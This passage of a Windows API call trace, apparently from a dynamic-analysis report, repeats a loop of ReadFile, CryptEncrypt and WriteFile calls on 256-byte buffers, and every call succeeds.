[0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.333] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.333] GetLastError () returned 0x0 [0155.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.333] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.334] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.334] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.334] GetLastError () returned 0x0 [0155.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.335] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.335] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.335] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.336] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.336] GetLastError () returned 0x0 [0155.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.337] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.337] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.337] GetLastError () returned 0x0 [0155.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, 